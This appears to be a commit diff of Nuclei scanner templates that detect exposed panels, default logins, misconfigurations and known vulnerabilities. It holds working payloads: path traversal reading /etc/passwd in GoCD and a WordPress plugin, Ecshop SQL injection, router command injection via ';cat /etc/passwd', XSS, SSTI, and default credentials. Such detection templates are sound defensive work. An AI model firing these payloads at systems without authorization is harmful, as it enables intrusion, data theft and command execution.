part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- "System.ArgumentNullException"

28
cves/2021/CVE-2021-43287.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2021-43287
info:
name: Pre-Auth Takeover of Build Pipelines in GoCD
author: dhiyaneshDk
severity: critical
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
tags: cve,cve2021,go,lfi,gocd
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
requests:
- method: GET
path:
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

37
default-logins/pentaho/pentaho-default-login.yaml Normal file
View File

@ -0,0 +1,37 @@
id: pentaho-default-login
info:
name: Pentaho Default Login
author: pussycat0x
severity: high
metadata:
shodan-query: 'pentaho'
tags: pentaho,default-login
requests:
- raw:
- |
POST /pentaho/j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
j_username={{user}}&j_password={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- password
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'pentaho/Home'
- 'JSESSIONID='
condition: and
- type: status
status:
- 302

32
exposed-panels/acemanager-login.yaml Normal file
View File

@ -0,0 +1,32 @@
id: acemanager-login
info:
name: ACEmanager detect
author: pussycat0x
severity: info
metadata:
fofa-dork: 'app="ACEmanager"'
tags: login,tech,acemanager
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>::: ACEmanager :::</title>'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'ALEOS Version ([0-9.]+) \| Copyright &co'

26
exposed-panels/cisco/cisco-prime-infrastructure.yaml Normal file
View File

@ -0,0 +1,26 @@
id: cisco-prime-infrastructure
info:
name: Cisco Prime Infrastructure
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"prime infrastructure"'
tags: panel,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/webacs/pages/common/login.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'productName = "Prime Infrastructure"'
- "Cisco&nbsp;"
- type: status
status:
- 200

24
exposed-panels/gocd-login.yaml Normal file
View File

@ -0,0 +1,24 @@
id: gocd-login
info:
name: GoCD Login
author: dhiyaneshDK
severity: info
tags: go,panel,gocd
metadata:
shodan-query: 'html:"GoCD Version"'
requests:
- method: GET
path:
- '{{BaseURL}}/go/auth/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Login - Go</title>'
- 'gocd-params'
- type: status
status:
- 200

25
exposed-panels/kenesto-login.yaml Normal file
View File

@ -0,0 +1,25 @@
id: kenesto-login
info:
name: Kenesto Login Detect
author: pussycat0x
severity: info
metadata:
fofa-dork: 'app="kenesto"'
tags: login,tech,kenesto
requests:
- method: GET
path:
- "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Welcome To Kenesto&reg;</title>'
condition: and
- type: status
status:
- 200

25
exposed-panels/kerio-connect-client.yaml Normal file
View File

@ -0,0 +1,25 @@
id: kerio-connect-client
info:
name: Kerio Connect Client
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"Kerio Connect Client"'
tags: panel,kerio
requests:
- method: GET
path:
- "{{BaseURL}}/webmail/login/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Kerio Connect Client</title>"
- type: status
status:
- 200

25
exposed-panels/meshcentral-login.yaml Normal file
View File

@ -0,0 +1,25 @@
id: meshcentral-login
info:
name: MeshCentral - Login
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"MeshCentral - Login"'
tags: panel,meshcentral
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>MeshCentral - Login</title>"
- type: status
status:
- 200

19
exposed-panels/pentaho-panel.yaml Normal file
View File

@ -0,0 +1,19 @@
id: pentaho-panel
info:
name: Pentaho Panel
author: princechaddha,dhiyaneshDK
severity: info
metadata:
shodan-query: 'pentaho'
tags: panel,pentaho
requests:
- method: GET
path:
- '{{BaseURL}}/pentaho/Login'
matchers:
- type: word
words:
- '<title>Pentaho User Console - Login</title>'

25
exposed-panels/shoutcast-server.yaml Normal file
View File

@ -0,0 +1,25 @@
id: shoutcast-server
info:
name: SHOUTcast Server
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"SHOUTcast Server"'
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/index.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>SHOUTcast Server</title>"
- type: status
status:
- 200

24
exposed-panels/sitecore-login.yaml Normal file
View File

@ -0,0 +1,24 @@
id: sitecore-login
info:
name: SiteCore Login
author: dhiyaneshDK
severity: info
metadata:
shodan-query: 'http.title:"Welcome to Sitecore"'
tags: panel,sitecore
requests:
- method: GET
path:
- '{{BaseURL}}/sitecore/login/default.aspx'
matchers-condition: and
matchers:
- type: word
words:
- '/sitecore/shell/Themes/Standard/Default/Login.css'
- type: status
status:
- 200

16
exposed-panels/solr-exposure.yaml
View File

@ -4,13 +4,25 @@ info:
name: Apache Solr Exposure
author: pdteam
severity: medium
tags: panel
tags: panel,solr
metadata:
shodan-query: http.title:"Solr Admin"
requests:
- method: GET
path:
- '{{BaseURL}}/solr/'
- '{{BaseURL}}'
stop-at-first-match: true
matchers:
- type: word
words:
- "<title>Solr Admin</title>"
- "<title>Solr Admin</title>"
extractors:
- type: regex
part: body
group: 1
regex:
- 'favicon\.ico\?_=([0-9.]+)'

24
exposed-panels/weblogic-login.yaml Normal file
View File

@ -0,0 +1,24 @@
id: weblogic-login
info:
name: Weblogic Login Panel
author: bing0o
severity: info
tags: panel,weblogic
metadata:
shodan-query: product:"Oracle Weblogic"
requests:
- method: GET
path:
- "{{BaseURL}}/console/login/LoginForm.jsp"
matchers-condition: and
matchers:
- type: word
words:
- "WebLogic"
- type: status
status:
- 200

6
exposed-panels/wordpress-login.yaml
View File

@ -1,8 +1,8 @@
id: wordpress-panel
id: wordpress-login
info:
name: WordPress Panel
author: github.com/its0x08
name: WordPress login
author: its0x08
severity: info
tags: panel

37
misconfiguration/gitlab/gitlab-graphql-user-enum.yaml
View File

@ -1,37 +0,0 @@
id: gitlab-graphql-user-enum
info:
name: Gitlab User enumeration via Graphql API
author: pikpikcu
severity: info
tags: gitlab,enum,misconfig
requests:
- method: POST
path:
- "{{BaseURL}}/api/graphql"
headers:
Content-Type: application/json
body: |
{
"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: word
condition: and
words:
- avatarUrl
- username
- email
- type: status
status:
- 200

2
misconfiguration/gitlab/gitlab-user-enum.yaml
View File

@ -5,7 +5,7 @@ info:
name: GitLab - User Enumeration
severity: info
reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
tags: gitlab,enum,misconfig
tags: gitlab,enum,misconfig,fuzz
requests:
- raw:

31
misconfiguration/gocd/gocd-cruise-configuration.yaml Normal file
View File

@ -0,0 +1,31 @@
id: gocd-cruise-configuration
info:
name: GoCd Cruise Configuration disclosure
author: dhiyaneshDk
severity: high
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
tags: go,gocd,config,exposure,misconfig
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
requests:
- method: GET
path:
- "{{BaseURL}}/go/add-on/business-continuity/api/cruise_config"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "server agentAutoRegisterKey"
- "webhookSecret"
- "tokenGenerationKey"
condition: and

39
misconfiguration/gocd/gocd-encryption-key.yaml Normal file
View File

@ -0,0 +1,39 @@
id: gocd-encryption-key
info:
name: GoCd Encryption Key
author: dhiyaneshDk
severity: low
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
tags: go,gocd,exposure,misconfig
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
requests:
- method: GET
path:
- "{{BaseURL}}/go/add-on/business-continuity/api/cipher.aes"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "([a-z0-9]){32}"
- type: word
part: header
words:
- "text/plain"
extractors:
- type: regex
regex:
- "([a-z0-9]){32}"

29
misconfiguration/gocd/gocd-unauth-dashboard.yaml Normal file
View File

@ -0,0 +1,29 @@
id: gocd-unauth-dashboard
info:
name: GoCd Unauth Dashboard
author: dhiyaneshDk
severity: medium
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
tags: go,gocd,unauth,misconfig
requests:
- method: GET
path:
- '{{BaseURL}}/go/admin/pipelines/create?group=defaultGroup'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Create a pipeline - Go</title>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

2
misconfiguration/nginx/nginx-status.yaml
View File

@ -3,7 +3,7 @@ id: nginx-status
info:
name: Nginx Status Page
author: dhiyaneshDK
severity: low
severity: info
tags: misconfig,nginx
requests:

24
misconfiguration/sitecore-debug-page.yaml Normal file
View File

@ -0,0 +1,24 @@
id: sitecore-debug-page
info:
name: SiteCore Debug Page
author: dhiyaneshDK
severity: low
metadata:
shodan-query: 'http.title:"Welcome to Sitecore"'
tags: debug,sitecore
requests:
- method: GET
path:
- "{{BaseURL}}/sitecore/'"
matchers-condition: and
matchers:
- type: word
words:
- 'extranet\Anonymous'
- type: status
status:
- 404

17
network/samba-detect.yaml Normal file
View File

@ -0,0 +1,17 @@
id: samba-detection
info:
name: samba detection
author: pussycat0x
severity: info
tags: network,smb, samba
network:
- inputs:
- data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:139"
matchers:
- type: word
words:
- "SMBr"

8
takeovers/bigcartel-takeover.yaml
View File

@ -11,7 +11,13 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "<h1>Oops! We couldn&#8217;t find that page.</h1>"
- "<h1>Oops! We couldn&#8217;t find that page.</h1>"
- type: dsl
dsl:
- '!contains(host,"bigcartel.com")'

12
takeovers/freshdesk-takeover.yaml
View File

@ -16,11 +16,11 @@ requests:
matchers:
- type: word
words:
- There is no helpdesk here!
- Maybe this is still fresh!
- 'There is no helpdesk here!'
- 'May be this is still fresh!'
- 'freshdesk.com/signup'
condition: and
- type: word
words:
- "freshservice.com"
negative: true
- type: dsl
dsl:
- '!contains(host,"freshpo.com")'

7
takeovers/github-takeover.yaml
View File

@ -12,8 +12,13 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "There isn't a GitHub Pages site here."
- "For root URLs (like http://example.com/) you must provide an index.html file"
- "For root URLs (like http://example.com/) you must provide an index.html file"
- type: dsl
dsl:
- '!contains(host,"githubapp.com")'

12
takeovers/shopify-takeover.yaml
View File

@ -12,8 +12,18 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
- "Sorry, this shop is currently unavailable."
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
condition: or
- type: word
words:
- 'shop-not-found'
- type: dsl
dsl:
- '!contains(host,"myshopify.com")'

7
takeovers/tumblr-takeover.yaml
View File

@ -12,9 +12,14 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- Whatever you were looking for doesn't currently exist at this address.
- There's nothing here.
condition: and
condition: and
- type: dsl
dsl:
- '!contains(host,"tumblr.com")'

30
technologies/fastjson-version.yaml Normal file
View File

@ -0,0 +1,30 @@
id: fastjson-version
info:
name: Fastjson Version Detection
author: yuansec
severity: info
description: If the server returns an exception to the client,The fastjson version will be retrieved,Fastjson versions greater than 1.2.41,Contains the latest version(1.2.76).
reference: https://blog.csdn.net/caiqiiqi/article/details/107907489
tags: fastjson,tech
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"@type":"java.lang.AutoCloseable"
matchers:
- type: word
words:
- 'fastjson-version'
extractors:
- type: regex
part: body
group: 1
regex:
- 'fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)'

24
technologies/sitecore-default-page.yaml Normal file
View File

@ -0,0 +1,24 @@
id: sitecore-default-page
info:
name: Sitecore Default Page
author: DhiyaneshDK
severity: info
metadata:
shodan-query: http.title:"Welcome to Sitecore"
tags: tech,sitecore
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "Welcome to Sitecore"
- type: status
status:
- 200

15
technologies/weblogic-detect.yaml
View File

@ -2,16 +2,25 @@ id: weblogic-detect
info:
name: Detect Weblogic
author: bing0o
author: pdteam
severity: info
tags: tech,weblogic
metadata:
shodan-query: product:"Oracle Weblogic"
requests:
- method: GET
path:
- "{{BaseURL}}/console/login/LoginForm.jsp"
- "{{BaseURL}}/{{randstr}}"
matchers-condition: and
matchers:
- type: word
words:
- "WebLogic"
- "From RFC 2068"
- "Error 404--Not Found"
condition: and
- type: status
status:
- 404

4
token-spray/api-abuseipdb.yaml
View File

@ -4,7 +4,9 @@ info:
name: AbuseIPDB API Test
author: daffainfo
severity: info
reference: https://docs.abuseipdb.com/
reference:
- https://docs.abuseipdb.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
tags: token-spray,abuseipdb
self-contained: true

4
token-spray/api-alienvault.yaml
View File

@ -4,7 +4,9 @@ info:
name: AlienVault Open Threat Exchange (OTX) API Test
author: daffainfo
severity: info
reference: https://otx.alienvault.com/api
reference:
- https://otx.alienvault.com/api
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
tags: token-spray,alienvault
self-contained: true

4
token-spray/api-aniapi.yaml
View File

@ -4,7 +4,9 @@ info:
name: AniAPI API Test
author: daffainfo
severity: info
reference: https://aniapi.com/docs/authentication
reference:
- https://aniapi.com/docs/authentication
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md
tags: token-spray,aniapi
self-contained: true

4
token-spray/api-cooperhewitt.yaml
View File

@ -4,7 +4,9 @@ info:
name: Cooper Hewitt API
author: daffainfo
severity: info
reference: https://collection.cooperhewitt.org/api/methods/
reference:
- https://collection.cooperhewitt.org/api/methods/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
tags: token-spray,cooperhewitt
self-contained: true

25
token-spray/api-covalent.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-covalent
info:
name: Covalent API Test
author: daffainfo
severity: info
reference:
- https://www.covalenthq.com/docs/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md
tags: token-spray,covalent
self-contained: true
requests:
- method: GET
path:
- "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}"
matchers:
- type: word
part: body
words:
- '"address":'
- '"updated_at":'
- '"next_update_at":'
condition: and

4
token-spray/api-dribbble.yaml
View File

@ -4,7 +4,9 @@ info:
name: Dribbble API Test
author: daffainfo
severity: info
reference: https://developer.dribbble.com/v2/
reference:
- https://developer.dribbble.com/v2/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
tags: token-spray,dribbble
self-contained: true

31
token-spray/api-etherscan.yaml Normal file
View File

@ -0,0 +1,31 @@
id: api-etherscan
info:
name: Etherscan API Test
author: daffainfo
severity: info
reference:
- https://docs.etherscan.io/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md
tags: token-spray,etherscan
self-contained: true
requests:
- method: GET
path:
- "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}"
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'Invalid API Key'
- type: word
part: body
words:
- '"status":'
- '"message":"OK"'
condition: and

4
token-spray/api-europeana.yaml
View File

@ -4,7 +4,9 @@ info:
name: Europeana API Test
author: daffainfo
severity: info
reference: https://pro.europeana.eu/page/search
reference:
- https://pro.europeana.eu/page/search
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
tags: token-spray,europeana
self-contained: true

4
token-spray/api-iucn.yaml
View File

@ -4,7 +4,9 @@ info:
name: IUCN API Test
author: daffainfo
severity: info
reference: http://apiv3.iucnredlist.org/api/v3/docs
reference:
- http://apiv3.iucnredlist.org/api/v3/docs
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
tags: token-spray,iucn
self-contained: true

4
token-spray/api-myanimelist.yaml
View File

@ -4,7 +4,9 @@ info:
name: MyAnimeList API Test
author: daffainfo
severity: info
reference: https://myanimelist.net/apiconfig/references/api/v2
reference:
- https://myanimelist.net/apiconfig/references/api/v2
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md
tags: token-spray,myanimelist
self-contained: true

28
token-spray/api-nownodes.yaml Normal file
View File

@ -0,0 +1,28 @@
id: api-nownodes
info:
name: Nownodes API Test
author: daffainfo
severity: info
reference:
- https://nownodes.io/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md
tags: token-spray,nownodes
self-contained: true
requests:
- raw:
- |
GET https://bsc-blockbook.nownodes.io/api HTTP/1.1
Host: bsc-blockbook.nownodes.io
api-key: {{token}}
Content-Type: application/json
matchers:
- type: word
part: body
words:
- '"coin":'
- '"host":'
- '"version":'
condition: and

4
token-spray/api-rijksmuseum.yaml
View File

@ -4,7 +4,9 @@ info:
name: Rijksmuseum API Test
author: daffainfo
severity: info
reference: https://data.rijksmuseum.nl/user-generated-content/api/
reference:
- https://data.rijksmuseum.nl/user-generated-content/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md
tags: token-spray,rijksmuseum
self-contained: true

6
token-spray/api-thecatapi.yaml
View File

@ -4,7 +4,9 @@ info:
name: TheCatApi API Test
author: daffainfo
severity: info
reference: https://docs.thecatapi.com/
reference:
- https://docs.thecatapi.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md
tags: token-spray,thecatapi
self-contained: true
@ -21,4 +23,4 @@ requests:
words:
- '"country_code":'
- '"created_at":'
condition: and
condition: and

27
token-spray/api-thedogapi.yaml Normal file
View File

@ -0,0 +1,27 @@
id: api-thedogapi
info:
name: TheDogApi API Test
author: daffainfo
severity: info
reference:
- https://docs.thedogapi.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md
tags: token-spray,thedogapi
self-contained: true
requests:
- method: GET
path:
- "https://api.thedogapi.com/v1/votes"
headers:
x-api-key: "{{token}}"
matchers:
- type: word
part: body
words:
- 'id":'
- 'image_id":'
- 'sub_id":'
condition: and

4
token-spray/api-urlscan.yaml
View File

@ -4,7 +4,9 @@ info:
name: URLScan API Test
author: daffainfo
severity: info
reference: https://urlscan.io/docs/api/
reference:
- https://urlscan.io/docs/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md
tags: token-spray,urlscan
self-contained: true

4
token-spray/api-virustotal.yaml
View File

@ -4,7 +4,9 @@ info:
name: VirusTotal API Test
author: daffainfo
severity: info
reference: https://developers.virustotal.com/reference#getting-started
reference:
- https://developers.virustotal.com/reference
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md
tags: token-spray,virustotal
self-contained: true

27
vulnerabilities/other/ecshop-sqli.yaml Normal file
View File

@ -0,0 +1,27 @@
id: ecshop-sqli
info:
name: Ecshop SQLi
author: Lark-lab,ImNightmaree
severity: high
reference:
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
tags: sqli,php,ecshop
requests:
- raw:
- |
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
matchers:
- type: word
words:
- 'XPATH syntax error:'
- '[error] =>'
- '[0] => Array'
- 'MySQL server error report:Array'
condition: and

32
vulnerabilities/other/seowon-router-rce.yaml Normal file
View File

@ -0,0 +1,32 @@
id: seowon-router-rce
info:
name: Seowon 130-SLC router - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page
reference: https://www.exploit-db.com/exploits/50295
tags: rce,seowon,router,unauth
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/diagnostic.html?t=201701020919
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
Connection: keep-alive
Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: status
status:
- 200

8
vulnerabilities/other/twig-php-ssti.yaml
View File

@ -5,20 +5,22 @@ info:
author: madrobot
severity: high
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
tags: php,ssti
tags: php,ssti,twig
requests:
- method: GET
path:
- "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D"
skip-variables-check: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "1788906"
part: body
- type: status
status:
- 404
negative: true
negative: true

34
vulnerabilities/other/vanguard-post-xss.yaml Normal file
View File

@ -0,0 +1,34 @@
id: vanguard-post-xss
info:
name: Vanguard Marketplace CMS ≤ 2.1
author: ImNightmaree
severity: medium
description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box
reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
tags: vanguard,xss
requests:
- raw:
- |
POST /search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
vulnerabilities/wordpress/ad-widget-lfi.yaml Normal file
View File

@ -0,0 +1,27 @@
id: ad-widget-lfi
info:
name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
author: 0x_Akoko
severity: high
description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
reference:
- https://cxsecurity.com/issue/WLB-2017100084
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

6
vulnerabilities/wordpress/rdf-user-enumeration.yaml → vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml
View File

@ -1,10 +1,10 @@
id: rdf-user-enumeration
id: wordpress-rdf-user-enum
info:
name: Wordpress RDF User Enumeration
author: r3dg33k
severity: info
tags: wordpress
tags: wordpress,enum
requests:
- method: GET
@ -36,4 +36,4 @@ requests:
part: body
group: 1
regex:
- '<dc:creator><!\[CDATA\[([a-z]+)\]\]><\/dc:creator>'
- '<dc\:creator><\!\[CDATA\[(.*?)\]\]></dc'

10
workflows/gocd-workflow.yaml Normal file
View File

@ -0,0 +1,10 @@
id: gocd-workflow
info:
name: GoCD Security Checks
author: dhiyaneshDk
description: A simple workflow that runs all GoCD Pipeline related nuclei templates on a given target.
workflows:
- template: exposed-panels/gocd-login.yaml
subtemplates:
- tags: gocd

13
workflows/sitecore-workflow.yaml Normal file
View File

@ -0,0 +1,13 @@
id: sitecore-workflow
info:
name: SiteCore Security Checks
author: pdteam
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
workflows:
- template: technologies/sitecore-default-page.yaml
- template: exposed-panels/sitecore-login.yaml
subtemplates:
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
- template: misconfiguration/sitecore-debug-page.yaml